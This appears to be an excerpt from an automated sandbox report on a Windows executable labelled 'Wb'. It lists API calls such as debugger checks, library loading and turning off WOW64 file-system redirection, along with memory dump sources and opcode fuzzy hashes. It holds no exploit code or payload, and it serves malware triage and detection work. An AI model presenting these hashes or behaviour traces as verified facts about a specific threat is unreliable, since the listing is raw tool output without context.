                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00FE97BA,FF8BC369,00000000,00000002,00000000,?,00FE5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00FD6F41), ref: 00FE974E
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FE9755
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00FBF27B
                                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00FBF289
                                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBF29F
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00FBF2B1
                                                                                                                                                                                                                                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 010032D8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00FC3006
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                        • String ID: CALL
                                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                                        • Opcode ID: a24d6fcb7dfec7afaa1c97e8d19320888895897862f2170b777dea9d1666a447
                                                                                                                                                                                                                                                                                                        • Instruction ID: cf4d52d45d6fa88286ef712ec97dc043db42d4adb6ebabca70f6fb58da55bb7b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a24d6fcb7dfec7afaa1c97e8d19320888895897862f2170b777dea9d1666a447
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F22A9716082029FD754DF28C981F2ABBF1FF88314F14895DE4868B3A2D776E941EB52
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: b7723929dea882cacbd249308ee1d4c5a6680847daa9f1e8d38cbc8db9c68357
                                                                                                                                                                                                                                                                                                        • Instruction ID: 08f568477ea9ddada1dee1414ed39de0cbf5001973d3a2d4580f10368678a58a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7723929dea882cacbd249308ee1d4c5a6680847daa9f1e8d38cbc8db9c68357
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F132E270A00206DFEB21DF54CC81FAEB7B6BF05310F048559E9959B292EB36EDA0DB51
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00FF413B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB55D1,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00FB5871
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00FB3A76
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                        • String ID: X
                                                                                                                                                                                                                                                                                                        • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                                        • Opcode ID: 304c19a85fae31f1a306c1d0afe80922c3793d318d735a7997099bc5e249641c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9b3d93ad0860355b3876d20fa7d032b2e31e88048aa002373a800560b3bbde14
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 304c19a85fae31f1a306c1d0afe80922c3793d318d735a7997099bc5e249641c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A721C071E002589BDB11DF95CC49BEE7BFCAF49310F10801AE544A7281DFBC9A899FA1
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB3A3C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 842039f47310e4c414c34332e1a42cf0bb4f2be548adb7e9621fe831e6e12cb4
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd118e38677cf5681affa1387244666e7a15ce7d9a72da1e179859902c7075ad
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 842039f47310e4c414c34332e1a42cf0bb4f2be548adb7e9621fe831e6e12cb4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1331C1B1A047019FD320DF25D8947DBBBE8FB59718F00092EE6D987240E779A948DF52
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsThemeActive.UXTHEME ref: 00FB333D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FB32FB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FB3312
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00FB3368,?), ref: 00FB33BB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00FB3368,?), ref: 00FB33CE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,01082418,01082400,?,?,?,?,?,?,00FB3368,?), ref: 00FB343A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB338B: SetCurrentDirectoryW.KERNEL32(?,00000001,01082418,?,?,?,?,?,?,?,00FB3368,?), ref: 00FB34BB
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00FB3377
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00FCF96C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBEE50: GetInputState.USER32 ref: 00FBEF07
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0100FB22
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4149333218-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00FBCEEE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0101FCCE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8c24bc705273089e2c978586abb9d5b5e43a769addc65e0546067bf86b0ffffd
                                                                                                                                                                                                                                                                                                        • Instruction ID: b8df9017ad561083667fefb7ba1885481e32e1f87c16ac86a538b4f3f4de654b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c24bc705273089e2c978586abb9d5b5e43a769addc65e0546067bf86b0ffffd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7541E6B650020AAFDB11EF68CC809EEB7F9FF44310B14456EE592D7255EB78DA09CB50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FB668B,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB664A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB665C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB663E: FreeLibrary.KERNEL32(00000000,?,?,00FB668B,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB666E
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB66AB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FF5657,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB6610
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB6622
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB6607: FreeLibrary.KERNEL32(00000000,?,?,00FF5657,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB6635
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a5721c15946386d1d89c26423751d4d33dd9b6ef325ab1936837ca52d3a4f531
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3b2ce9e65206d4515ec5b70cb1b537a6053361a2e38f1ad05c0d47cfefc3f744
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5721c15946386d1d89c26423751d4d33dd9b6ef325ab1936837ca52d3a4f531
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34110472600205ABCB14BB62CD42BED77A29F50714F10442EF582EA1C1DE7DDA04BF50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 92fcdb1ee5ac8366f7593cb978050a5692d7f755d1ec508165ce87d50e95c8c1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0e0b61236674a02a5f366d21df53fad7b7df7c81b3daf38ff17b8e816a3650a7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92fcdb1ee5ac8366f7593cb978050a5692d7f755d1ec508165ce87d50e95c8c1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06115A7290420AAFCF05DF99E94099E7BF4EF48350F1040A9F808AB311DA31EA12DB64
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00FE319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00FE5031
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE53DF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 833e9b91b7347006b70b2f23f64438b287a5c88c51203dc02a94246b8073389c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F30126726003886FE3318E6ADC85A5AFBEDEB85370F25052DE58483280EA70A8059764
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7e192984cd9cb07b6203ca38c454f3f75f33cc9b98e4ab8c7a18697f097e55f7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0F0283290262056D6313A2B9C11B5E339A8F42378F180727F5259B3D2EF78E802B6D3
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cb2b703d0bea2568805d9b0664af71014f255f26f2b423121c1e29c1d66a2b2e
